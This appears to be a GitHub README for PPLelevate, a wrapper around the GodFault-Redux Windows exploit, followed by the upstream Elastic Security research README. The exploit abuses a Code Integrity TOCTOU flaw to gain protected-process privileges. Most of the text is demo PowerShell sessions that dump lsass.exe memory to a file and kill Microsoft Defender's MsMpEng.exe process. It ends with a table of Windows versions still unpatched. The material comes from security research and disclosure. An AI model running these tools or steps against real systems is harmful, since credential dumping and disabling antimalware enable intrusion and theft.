Elevate process to PPL status using GodFault-Redux exploit.
This is a minimalist extension to Gabriel Landau's GodFault-Redux exploit which allows elevating a specified or the calling process to PPL-AntiMalware.
Usage: PPLelevate <Process ID (optional)>
Calling without argument will result in the calling process being elevated. This grants the elevated process access to, for example, Microsoft-Windows-Threat-Intelligence ETW Provider.
Thanks to Gabriel Landau for GodFault-Redux.
By Gabriel Landau at Elastic Security.
A variant of the now-patched PPLFault exploit which bypasses Microsoft's mitigation for PPLFault.
Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process. For more details on the exploit, see our research:
2026-02-08-Redux-GodFault-Demo.mp4
PS C:\Users\user\Desktop> cmd /c ver
Microsoft Windows [Version 10.0.20348.4773]
PS C:\Users\user\Desktop> $TargetPid = (Get-Process lsass).Id
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid $TargetPid).Protection
Type Signer
---- ------
ProtectedLight Lsa
PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\Redux.exe -v $TargetPid lsass.dmp
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
[+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Give the memory manager a moment to think
[+] Emptying system working set
[+] Working set purged
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Successfully hydrated file: C:\PPLFaultTemp\EventAggregationPH.dll
[+] Dump saved to: lsass.dmp
[+] Dump is 49.1 MB
[+] Operation took 2109 ms
PS C:\Users\user\Desktop> dir *.dmp
Directory: C:\Users\user\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/11/2026 4:17 PM 51500633 lsass.dmp
Exploits the same TOCTOU as Redux. However instead of dumping a process, it migrates to CSRSS and exploits a vulnerability in win32k!NtUserHardErrorControlCall from ANGRYORCHARD to decrement KTHREAD.PreviousMode from UserMode (1) to KernelMode (0). It proves "God Mode" access by killing a normally-unkillable process, such as MsMpEng.exe
PS C:\Users\user\Desktop> (Get-Process MsMpEng).Id
844
PS C:\Users\user\Desktop> taskkill /f /pid 844
ERROR: The process with PID 844 could not be terminated.
Reason: Access is denied.
PS C:\Users\user\Desktop> .\GodFault-Redux.exe -k MsMpEng.exe
[+] Thread 5668 (KTHREAD FFFFB9043ACB2080) has been blessed by GodFault
[+] Initial blessing successful
[+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
[+] Opened \Device\PhysicalMemory. Handle is 0x14c
[+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x148
[+] GodFault killed process 844: MsMpEng.exe
PS C:\Users\user\Desktop> (Get-Process MsMpEng).Id
Get-Process : Cannot find a process with the name "MsMpEng". Verify the process name and call the cmdlet again.
At line:1 char:2
+ (Get-Process MsMpEng).Id
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (MsMpEng:String) [Get-Process], ProcessCommandException
+ FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand
| Operating System | Lifecycle | Fix Status |
|---|---|---|
| Windows 11 24H2 | Mainstream Support | ✔ Fixed |
| Windows 10 Enterprise LTSC 2021 | Mainstream Support | ❌ Still functional as of February 2026 (19044.6937) |
| Windows Server 2025 | Mainstream Support | ✔ Fixed |
| Windows Server 2022 | Mainstream Support | ❌ Still functional as of February 2026 (20348.4773) |
| Windows Server 2019 | Extended Support | ❌ Still functional as of February 2026 (17763.8389) |
Redux is covered by the ELv2 license. It uses phnt from SystemInformer under the MIT license.
Redux is based on our prior work, PPLFault, which was inspired by PPLdump by Clément Labro.
ANGRYORCHARD was created by Austin Hudson, who released it when Microsoft patched PPLdump.